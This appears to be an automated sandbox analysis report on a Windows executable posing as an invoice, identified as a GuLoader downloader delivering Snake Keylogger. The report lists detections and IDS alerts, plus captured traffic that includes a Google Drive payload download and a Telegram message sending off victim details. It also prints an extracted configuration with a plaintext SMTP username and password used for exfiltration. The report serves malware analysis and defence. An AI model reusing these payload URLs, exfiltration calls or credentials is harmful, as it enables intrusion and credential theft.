
Windows Analysis Report
FACTURAS_1_250075.exe

Overview

General Information

Sample name: FACTURAS_1_250075.exe
Analysis ID: 1624624
MD5: 40ea152d46891890e84019097ef450bb
SHA1: ea96638903559200bc5cb6a710093ed941b9861b
SHA256: 212a64eefc140fd406653b68255c01ffb54b1827f226f63ce4f2b299aa290584
Tags: exe, user-adrian__luca

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file name differs from the original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FACTURAS_1_250075.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\FACTURAS_1_250075.exe" MD5: 40EA152D46891890E84019097EF450BB)
    • FACTURAS_1_250075.exe (PID: 2932 cmdline: "C:\Users\user\Desktop\FACTURAS_1_250075.exe" MD5: 40EA152D46891890E84019097EF450BB)
  • cleanup
Name | Description | Attribution | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed. | No Attribution | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "calidad@copinsa.com", "Password": "T#wZN*AFHxRq", "Host": "mail.copinsa.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author
0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000000.00000002.1917413249.000000000531D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: FACTURAS_1_250075.exe PID: 7468 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
Process Memory Space: FACTURAS_1_250075.exe PID: 2932 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-26T12:35:37.928892+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.10 | 65195 | 104.21.96.1 | 443 | TCP
2025-02-26T12:35:35.921606+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 65193 | 132.226.247.73 | 80 | TCP
2025-02-26T12:35:37.359162+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 65193 | 132.226.247.73 | 80 | TCP
2025-02-26T12:35:38.687152+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 65196 | 132.226.247.73 | 80 | TCP
2025-02-26T12:35:30.595826+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 65190 | 142.250.185.110 | 443 | TCP
2025-02-26T12:35:48.292749+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.10 | 65210 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "calidad@copinsa.com", "Password": "T#wZN*AFHxRq", "Host": "mail.copinsa.com", "Port": "587", "Version": "4.4"}
Source: FACTURAS_1_250075.exe | Virustotal: Detection: 70%
Source: FACTURAS_1_250075.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E0040 CryptUnprotectData | 12_2_380E0040
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E0014 CryptUnprotectData | 12_2_380E0014
Source: FACTURAS_1_250075.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:65194 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.10:65190 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:65191 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:65210 version: TLS 1.2
Source: FACTURAS_1_250075.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_00405FFD FindFirstFileA,FindClose | 0_2_00405FFD
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_0040559B
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_00402688 FindFirstFileA | 0_2_00402688
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_00405FFD FindFirstFileA,FindClose | 12_2_00405FFD
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_00402688 FindFirstFileA | 12_2_00402688
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 12_2_0040559B
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 057FF45Dh | 12_2_057FF4AC
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 057FF45Dh | 12_2_057FF2C0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380ED7C8h | 12_2_380ED4D0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E03C8h | 12_2_380E00F8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380ED19Fh | 12_2_380ECE30
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EFE08h | 12_2_380EFB10
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E86FEh | 12_2_380E8430
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E670Eh | 12_2_380E6440
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E471Eh | 12_2_380E4450
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E272Eh | 12_2_380E2460
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EAB46h | 12_2_380EA878
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EC34Eh | 12_2_380EC080
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EEFB0h | 12_2_380EECB8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E8B67h | 12_2_380E88C0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E6B9Eh | 12_2_380E68D0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E4BAEh | 12_2_380E48E0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E2BBEh | 12_2_380E28F0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EAFD6h | 12_2_380EAD08
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E8FE6h | 12_2_380E8D18
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EC7DEh | 12_2_380EC510
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E702Eh | 12_2_380E6D60
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E503Eh | 12_2_380E4D70
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E304Eh | 12_2_380E2D80
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EF478h | 12_2_380EF180
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EB466h | 12_2_380EB198
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EDC90h | 12_2_380ED998
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E9476h | 12_2_380E91A8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380ECC6Eh | 12_2_380EC9A0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then mov esp, ebp | 12_2_380E21C9
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E74BEh | 12_2_380E71F0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E54CEh | 12_2_380E5200
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E34DEh | 12_2_380E3210
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EB8F8h | 12_2_380EB628
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E9906h | 12_2_380E9638
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EF940h | 12_2_380EF648
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EE158h | 12_2_380EDE60
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E794Eh | 12_2_380E7680
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E595Eh | 12_2_380E5690
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E396Eh | 12_2_380E36A0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E9D96h | 12_2_380E9AC8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E7DDEh | 12_2_380E7B10
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EE620h | 12_2_380EE328
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E5DEEh | 12_2_380E5B20
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E3DFEh | 12_2_380E3B30
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EA226h | 12_2_380E9F58
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E826Eh | 12_2_380E7FA0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E627Eh | 12_2_380E5FB0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380E428Eh | 12_2_380E3FC0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EA6B6h | 12_2_380EA3E8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EBEBEh | 12_2_380EBBF0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380EEAE8h | 12_2_380EE7F0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380F2C48h | 12_2_380F2830
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FF5DDh | 12_2_380FF2A0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FC9D1h | 12_2_380FC728
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380F2681h | 12_2_380F23D0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380F2C48h | 12_2_380F2826
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FCEC9h | 12_2_380FCC20
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_380F0040
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_380F0853
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FD3C1h | 12_2_380FD118
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FD8B9h | 12_2_380FD610
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FDD11h | 12_2_380FDA68
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_380F0673
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FE169h | 12_2_380FDEC0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380F0D0Dh | 12_2_380F0B30
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380F16F8h | 12_2_380F0B30
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FE5E9h | 12_2_380FE340
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380F2C48h | 12_2_380F2B76
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FEA41h | 12_2_380FE798
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 380FEE99h | 12_2_380FEBF0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B8DE0h | 12_2_392B8AE8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B4628h | 12_2_392B4330
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B0800h | 12_2_392B0508
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B75F9h | 12_2_392B7300
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B5E10h | 12_2_392B5B18
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B1658h | 12_2_392B1360
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B6C68h | 12_2_392B6970
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B2E40h | 12_2_392B2B48
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B8450h | 12_2_392B8158
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B3C98h | 12_2_392B39A0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B24B0h | 12_2_392B21B8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B5480h | 12_2_392B5188
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B62D8h | 12_2_392B5FE0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B4AF0h | 12_2_392B47F8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B7AC0h | 12_2_392B77C8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B0CC8h | 12_2_392B09D0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B1B20h | 12_2_392B1828
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B8918h | 12_2_392B8620
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B7130h | 12_2_392B6E38
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B3308h | 12_2_392B3010
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B4160h | 12_2_392B3E68
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B0338h | 12_2_392B0040
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B5948h | 12_2_392B5650
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B67A0h | 12_2_392B64A8
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B2978h | 12_2_392B2680
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B1190h | 12_2_392B0E98
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B7F88h | 12_2_392B7C90
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B1FE8h | 12_2_392B1CF0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B4FB8h | 12_2_392B4CC0
Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 4x nop then jmp 392B37D0h | 12_2_392B34D8

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:65210 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.10:65000 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2026/02/2025%20/%2018:30:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
          Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
          Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:65196 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:65193 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:65190 -> 142.250.185.110:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:65195 -> 104.21.96.1:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:65194 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2026/02/2025%20/%2018:30:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
